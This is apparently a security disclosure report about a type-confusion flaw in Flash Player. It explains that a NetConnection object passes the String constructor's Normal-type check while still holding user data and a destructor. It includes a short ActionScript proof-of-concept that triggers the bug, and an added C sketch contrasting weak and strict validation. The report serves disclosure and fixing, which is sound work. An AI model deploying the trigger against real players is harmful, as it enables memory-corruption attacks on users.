When an object is verified to be of type Normal, it should also be verified to have null user data and a null destructor. Otherwise, some paths could allow type confusion, for example:

    var n = new NetConnection();
    this.__proto__ = n;
    var y;
    trace(y);
    this.connect(y);
    this.__proto__ = {};
    this.__proto__.__constructor__ = String;
    super("test");
    trace(this);

In this case, the NetConnection object passes the Normal check in the String constructor, because the object is of type Normal and is not a function. But it still has user data and a destructor set, which causes type confusion when the String object is destroyed. PoC code and swf attached.
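
The difference between the type-only check and the check requested above, as an added example that is not part of the original report or of the player's code. The object layout and every function name here are hypothetical stand-ins, not Flash internals.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical object model; all names are assumptions, not Flash internals. */
typedef enum { OBJ_NORMAL, OBJ_FUNCTION } obj_type;

typedef struct object {
    obj_type type;
    void *user_data;             /* native state attached by a native class */
    void (*destructor)(void *);  /* called on user_data when the object dies */
} object;

/* Type-only check: the behaviour the report describes as insufficient. */
int is_normal_weak(const object *o) {
    return o->type == OBJ_NORMAL;
}

/* Check the report asks for: Normal type AND no native state attached. */
int is_normal_strict(const object *o) {
    return o->type == OBJ_NORMAL && o->user_data == NULL && o->destructor == NULL;
}

/* Stand-in for native code attaching state to an object. */
int attach_native_state(object *o, size_t size, void (*dtor)(void *)) {
    o->user_data = calloc(1, size);
    if (o->user_data == NULL) return -1;
    o->destructor = dtor;
    return 0;
}

/* Run the destructor once and clear both fields so the object is clean again. */
void release_native_state(object *o) {
    if (o->destructor != NULL) o->destructor(o->user_data);
    o->user_data = NULL;
    o->destructor = NULL;
}

int main(void) {
    object o = { OBJ_NORMAL, NULL, NULL };
    printf("fresh:    weak=%d strict=%d\n", is_normal_weak(&o), is_normal_strict(&o));
    if (attach_native_state(&o, 16, free) != 0) return 1;
    printf("attached: weak=%d strict=%d\n", is_normal_weak(&o), is_normal_strict(&o));
    release_native_state(&o);
    printf("released: weak=%d strict=%d\n", is_normal_weak(&o), is_normal_strict(&o));
    return 0;
}
```

A native constructor that gates on the strict form refuses any object that still carries another class's data and destructor, which is the state the type-only check lets through.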
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.